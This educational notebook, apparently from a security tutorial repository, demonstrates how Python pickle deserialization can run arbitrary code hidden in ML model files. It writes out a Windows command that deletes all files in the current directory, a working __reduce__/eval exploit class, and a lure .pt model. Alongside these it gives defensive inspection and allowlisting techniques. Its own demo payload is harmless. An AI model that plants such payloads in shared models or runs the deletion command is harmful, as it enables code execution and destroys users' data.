# Exploiting pickle serialization

<a href="https://colab.research.google.com/drive/1-xZDB44n_kgOaOqT3EcSPoPPsj_1BPbI" target="_blank">
  <img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab">
</a>

Return to the [castle](https://github.com/Nkluge-correa/teeny-tiny_castle).

[Python](https://www.python.org/) is one of the main programming languages used for _data science_ and _machine learning_ purposes. As such, developers using this language must be aware of the types of vulnerabilities that Python presents.

The `pickle` module in Python can be exploited to execute arbitrary code when a pickled object is loaded. `pickle` is a standard-library module used to serialize and deserialize Python objects, allowing them to be stored or transmitted as a byte stream.
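As a minimal sketch of the intended, benign use of serialization and deserialization, the snippet below round-trips a small dictionary through a byte stream. The `params` dictionary is a hypothetical stand-in for a tiny model and is not part of the original notebook.

```python
import pickle

# Hypothetical stand-in for a tiny "model": plain Python data only.
params = {"w": 1.0076, "b": 0.1234}

blob = pickle.dumps(params)    # serialize to a bytes object
restored = pickle.loads(blob)  # deserialize; fine here because we created blob ourselves

print(type(blob).__name__, restored == params)
```

Loading is only safe in this sketch because the bytes never left our control.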

However, if an attacker gains control of the pickled object, they can inject malicious code that is executed when the object is loaded with the `pickle` module. This is particularly dangerous when the pickled object is an ML model, i.e., something commonly downloaded and used in places like [Hugging Face](https://huggingface.co/). Formats such as [safetensors](https://huggingface.co/docs/safetensors/index) are designed to prevent malicious code execution, and [PyTorch is also introducing](https://pytorch.org/docs/stable/generated/torch.load.html) new features for safe serialization.

![pickle](https://media3.giphy.com/media/JmPenP1svctdfDCEHi/giphy.gif)

[Source](https://giphy.com/explore/pickle-rick)

First, let us define a malicious piece of Python code we want to run. Note that _anything that Python can execute can be made into a payload_ (e.g., batch/shell code). For example:

```Python

import os
os.system('''for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)''')

```

This payload is meant to delete all files and directories in the current working directory of some poor soul on Windows. But let's do something more Pythonic and less evil.

```Python
def foo():
    """
    Creates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.
    Opens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"
    using webbrowser.open. Deletes the os and webbrowser modules from sys.modules.

    Returns:
        None
    """
    import os
    for i in range(1, 11):
        os.mkdir(f'{"HA" * i}')

    import webbrowser
    webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")

    import sys
    del sys.modules["os"]
    del sys.modules["webbrowser"]
```


This function creates 10 directories whose names repeat "HA" ("HA", "HAHA", and so on) and opens your browser to the [`Teeny Tiny Castle` 🏰](https://github.com/Nkluge-correa/teeny-tiny_castle) repository. It could be turned into something much more harmful, but you should never create malicious code to be used against others.

Let us transform this function into a string, which we will later inject into a pickle file. We can use the `inspect` module and some of its utilities for this.

```Python
import inspect

# Turn the body of `foo` into a single string.
# Something like exec(inject_src) will then run this payload
# (exec executes Python source code that is built at runtime).
source = inspect.getsourcelines(foo)[0]  # list of source lines, each ending in "\n"
source = source[1:]  # drop the `def foo():` line
find_indent = len(source[0]) - len(source[0].lstrip())  # indentation of the body
source = [line[find_indent:] for line in source]  # dedent every line
# Each line already ends in "\n", so joining with "\n" inserts extra blank lines;
# they are harmless to exec and show up in the printed output.
inject_src = "\n".join(source)

print(inject_src)
```

```
"""

Creates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.

Opens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"

using webbrowser.open. Deletes the os and webbrowser modules from sys.modules.


Returns:

    None

"""

import os

for i in range(1, 11):

    os.mkdir(f'{"HA" * i}')


import webbrowser

webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")


import sys

del sys.modules["os"]

del sys.modules["webbrowser"]
```



The vulnerability of the `pickle` module poses a risk to ML engineers and practitioners, given that [PyTorch](https://pytorch.org/), among other libraries (e.g., [Hugging Face](https://huggingface.co/)), [uses pickle to save/load serialized objects (models) to/from disk](https://pytorch.org/docs/master/generated/torch.load.html).

This vulnerability is made explicit in both the `pickle` module documentation:

> **[Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data that will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source or that could have been tampered with.**

And in the `PyTorch` documentation:

> **[`torch.load()`](https://pytorch.org/docs/master/generated/torch.load.html#torch.load) uses the `pickle` module implicitly, which is known to be insecure. Constructing malicious pickle data to execute arbitrary code during unpickling is possible. Never load data that could have come from an untrusted source or been tampered with. Only load data you trust.**

As a preventive measure, we can inspect pickle objects with the `pickletools` module.


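```Python
import os
import pickle
import pickletools

# Save the payload string as an ordinary pickle file.
with open('pickle', 'wb') as fp:
    pickle.dump(inject_src, fp, protocol=pickle.HIGHEST_PROTOCOL)

# `python -m pickle <file>` loads a pickle file and displays its contents;
# the captured text is not printed here.
os.popen('python -m pickle pickle').read()

# Disassemble an in-memory pickle of the same string.
my_pickle = pickle.dumps(inject_src)

pickletools.dis(my_pickle)
```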


```
    0: \x80 PROTO      4
    2: \x95 FRAME      503
   11: X    BINUNICODE '"""\n\nCreates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.\n\nOpens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"\n\nusing webbrowser.open. Deletes the os and webbrowser modules from sys.modules.\n\n\nReturns:\n\n    None\n\n"""\n\nimport os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n'
  512: \x94 MEMOIZE    (as 0)
  513: .    STOP
highest protocol among opcodes = 4
```


Here, we can see the contents of this pickle file. But a string alone cannot execute code. We need something that will _execute_ the contents of this string when a pickle file is loaded.

`pickle` allows you to define custom behavior for the pickling process of your class instances. To get code execution, we need to implement the `__reduce__` method.

> The `__reduce__()` method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the "_reduce value_"). [...] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order: (1) a callable object that will be called to create the initial version of the object; (2) a tuple of arguments for the callable object (an empty tuple must be given if the callable does not accept any argument). [...]

Thus, by implementing `__reduce__` in a class whose instances we are going to pickle, we can hand the pickling process a callable plus some arguments that will be called when the object is unpickled. While this mechanism is intended for reconstructing objects, we can abuse it to get our code executed.
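A harmless sketch of this mechanism is shown below. The class name `Shout` and the printed message are hypothetical, chosen only for illustration; the callable is the built-in `print`, so the only side effect is a line of text.

```python
import pickle

class Shout:
    """Harmless illustration: unpickling calls whatever callable __reduce__ names."""

    def __reduce__(self):
        # (callable, args): the unpickler will call print("...") at load time.
        return print, ("this line ran during unpickling",)

blob = pickle.dumps(Shout())   # nothing is printed while pickling
result = pickle.loads(blob)    # print(...) is called here

# The loaded "object" is not a Shout instance; it is the callable's return value.
print(type(result).__name__)
```

Note that the unpickler never needs the `Shout` class itself: the byte stream only references the callable and its arguments.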

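Here we create a `dict` subclass that takes a string (our payload) plus the dictionary's contents as keyword arguments. Its `__reduce__` method returns `eval` as the callable, together with an expression string in which `exec` runs our payload. Because `exec` returns `None`, the expression `exec(...) or dict()` evaluates to an empty dictionary, which the unpickler then refills with the original key-value pairs.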

```Python
class EXPLOIT(dict):
    """
    The EXPLOIT class is a subclass of dict. It initializes an
    instance with an inject_src string and any additional keyword
    arguments passed to it. The inject_src string is stored in the
    instance as _inject_src. The __reduce__() method is overridden so
    that unpickling calls eval on an expression that first runs
    inject_src through exec and then evaluates to a new empty
    dictionary, which is refilled with the instance's key-value pairs
    (passed as an iterator). This class can be used for executing
    arbitrary code when a pickled instance is loaded.
    """

    def __init__(self, inject_src: str, **kwargs):
        super().__init__(**kwargs)
        self._inject_src = inject_src

    def __reduce__(self):
        # Reduce value: (callable, args, state, list items, dict items).
        return eval, (f"exec('''{self._inject_src}''') or dict()",), None, None, iter(self.items())
```


Through this trickery, we can save our executable payload without activating it in the process. When we disassemble the saved object, we see our code as a string inside an `exec` call. This code will be executed the moment we load this object.
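The two ingredients of this trick can be checked in isolation with a harmless sketch. The class name `KeepsItems` is hypothetical, and the callable here is plain `dict` instead of `eval`, so no payload is involved.

```python
import pickle

# exec() always returns None, so `exec(...) or dict()` evaluates to a new empty dict.
placeholder = eval("exec('pass') or dict()")
print(placeholder)

class KeepsItems(dict):
    """Harmless stand-in: same five-item reduce value, but the callable is just dict."""

    def __reduce__(self):
        # Items 3 and 4 (state, list items) are unused; item 5 yields key-value
        # pairs that the unpickler stores into the freshly created object.
        return dict, (), None, None, iter(self.items())

restored = pickle.loads(pickle.dumps(KeepsItems(w=1.0076, b=0.1234)))
print(type(restored).__name__, restored)
```

The restored object is an ordinary `dict` holding the original pairs, which is why a victim would see nothing unusual in the loaded data.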

Note: _the dictionary will still be intact after this process, so you can save a useful model that works when loaded but executes some malicious code in the background while it is being loaded. Below, we create the simplest linear model as an example_.

```Python
import pickle
import pickletools

my_dict = {'model': 'my_model', 'w': 1.0076, 'b': 0.1234}

# Saving the object does not run the payload; only loading does.
with open('bad_pickle', 'wb') as fp:
    pickle.dump(EXPLOIT(inject_src, **my_dict), fp,
                protocol=pickle.HIGHEST_PROTOCOL)

my_bad_pickle = pickle.dumps(EXPLOIT(inject_src, **my_dict))

pickletools.dis(my_bad_pickle)
```


```
    0: \x80 PROTO      4
    2: \x95 FRAME      596
   11: \x8c SHORT_BINUNICODE 'builtins'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'eval'
   28: \x94 MEMOIZE    (as 1)
   29: \x93 STACK_GLOBAL
   30: \x94 MEMOIZE    (as 2)
   31: X    BINUNICODE 'exec(\'\'\'"""\n\nCreates 10 directories named "HA", "HAHA", "HAHAHA", ..., "HAHAHAHAHA" using os.mkdir.\n\nOpens the Github page "https://github.com/Nkluge-correa/teeny-tiny_castle"\n\nusing webbrowser.open. Deletes the os and webbrowser modules from sys.modules.\n\n\nReturns:\n\n    None\n\n"""\n\nimport os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n\'\'\') or dict()'
  554: \x94 MEMOIZE    (as 3)
  555: \x85 TUPLE1
  556: \x94 MEMOIZE    (as 4)
  557: R    REDUCE
  558: \x94 MEMOIZE    (as 5)
  559: (    MARK
  560: \x8c     SHORT_BINUNI
```
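The disassembly above contains a global lookup (`builtins`, `eval`) followed by a `REDUCE` opcode, which is the point where the callable gets invoked. A rough way to automate that inspection, without ever loading the data, is to walk the opcodes with `pickletools.genops`. The helper name `flag_opcodes`, the `Demo` class, and the choice of opcodes to flag are assumptions made for this sketch; legitimate pickles of custom classes use the same opcodes, so a hit means "look closer", not "proven malicious".

```python
import pickle
import pickletools

# Opcodes that import a global or call a callable during unpickling.
SUSPICIOUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                      "NEWOBJ", "NEWOBJ_EX"}

def flag_opcodes(data):
    """Return the names of suspicious opcodes in a pickle, without loading it."""
    return [op.name for op, arg, pos in pickletools.genops(data)
            if op.name in SUSPICIOUS_OPCODES]

class Demo:
    def __reduce__(self):
        return len, ("harmless",)  # harmless stand-in for a payload

plain_flags = flag_opcodes(pickle.dumps({"w": 1.0076, "b": 0.1234}))
demo_flags = flag_opcodes(pickle.dumps(Demo()))
print(plain_flags)
print(demo_flags)
```

A dictionary of floats and strings needs none of these opcodes, while any object that relies on `__reduce__` does.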

⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️


```Python
import numpy as np
import plotly.graph_objects as go

# Loading the file triggers the payload, then returns an ordinary dict.
with open("bad_pickle", "rb") as fp:
    my_dict = pickle.load(fp)

print(my_dict)

w0 = my_dict['w']
b0 = my_dict['b']

# Noisy samples of y = x, plus the predictions of the loaded linear model.
x = np.random.randn(200)*2
noise = np.random.normal(1, 20, 200)*0.05
y = x + noise

model_LR = np.dot(x, w0) + b0

fig = go.Figure(data=go.Scatter(
    x=x, y=y, mode='markers', name='Mystery Function'))
fig.update_layout(template='plotly_dark',
                  title='Loaded Model Still Works!',
                  paper_bgcolor='rgba(0, 0, 0, 0)',
                  plot_bgcolor='rgba(0, 0, 0, 0)')
fig.add_trace(go.Scatter(x=x, y=model_LR,
              name=f'my_model = {round(w0, 4)} * x + {round(b0, 4)}'))

fig.show()
```


```
{'model': 'my_model', 'w': 1.0076, 'b': 0.1234}
```


How might this affect ML engineers and practitioners in the field? Platforms like `Hugging Face` democratize ML research by sharing models for many types of tasks. However, nothing prevents an attacker from uploading a model to such a platform (or to a code-sharing platform, e.g., `GitHub`) that contains malicious code to be executed when the model is loaded.

Below, we create a `.pt` file (the extension commonly used for models saved with PyTorch) containing nothing but 222,222,222 zeros and a malicious payload.

An attacker could save such a model (or a totally legitimate model), send it to a public repository, advertise their `ultimate_model_to_rule_all_models`, and hope that curiosity will lure victims into the trap.

```Python
import torch

junk = torch.zeros(222222222)

model = {
    "ultimate_model_to_rule_all_models": junk,
}

# Wrap the "model" in EXPLOIT so the payload travels with the saved file.
ultimate_model = EXPLOIT(inject_src, **model)

torch.save(ultimate_model, 'ultimate_model_to_rule_all_models.pt')
```


⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️


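```Python
# On newer PyTorch releases where `weights_only` defaults to `True`, this load
# is refused unless `weights_only=False` is passed explicitly.
model = torch.load('ultimate_model_to_rule_all_models.pt')

print(model)
```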


```
You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.

{'ultimate_model_to_rule_all_models': tensor([0., 0., 0.,  ..., 0., 0., 0.])}
```
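The warning above talks about limiting which functions may be executed during unpickling. The standard library supports a similar idea for plain pickles: subclass `pickle.Unpickler` and override `find_class`, which is called whenever the byte stream asks for a global. The sketch below assumes a tiny, hypothetical allowlist (`ALLOWED_GLOBALS`), and the names `RestrictedUnpickler`, `restricted_loads`, and `Sneaky` are illustrative; it is not how `torch.load` is implemented.

```python
import io
import pickle

# Hypothetical allowlist for this sketch; a real one depends on what your files contain.
ALLOWED_GLOBALS = {("builtins", "dict"), ("builtins", "list")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Like pickle.loads, but refuses globals outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Sneaky:
    def __reduce__(self):
        return eval, ("1 + 1",)  # harmless stand-in for a payload

print(restricted_loads(pickle.dumps({"w": 1.0076})))
try:
    restricted_loads(pickle.dumps(Sneaky()))
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

Plain data loads as usual, while the request for `builtins.eval` is rejected before anything is called.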


The moral of the story is that you should take the warnings in the `pickle` and `PyTorch` documentation seriously.

> [Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module is not secure. Only unpickle data you trust. Constructing malicious pickle data to execute arbitrary code during unpickling is possible.

As a precaution, one possible security measure is to load models from unverified sources only inside virtual machines. Stay safe, folks! 🙃

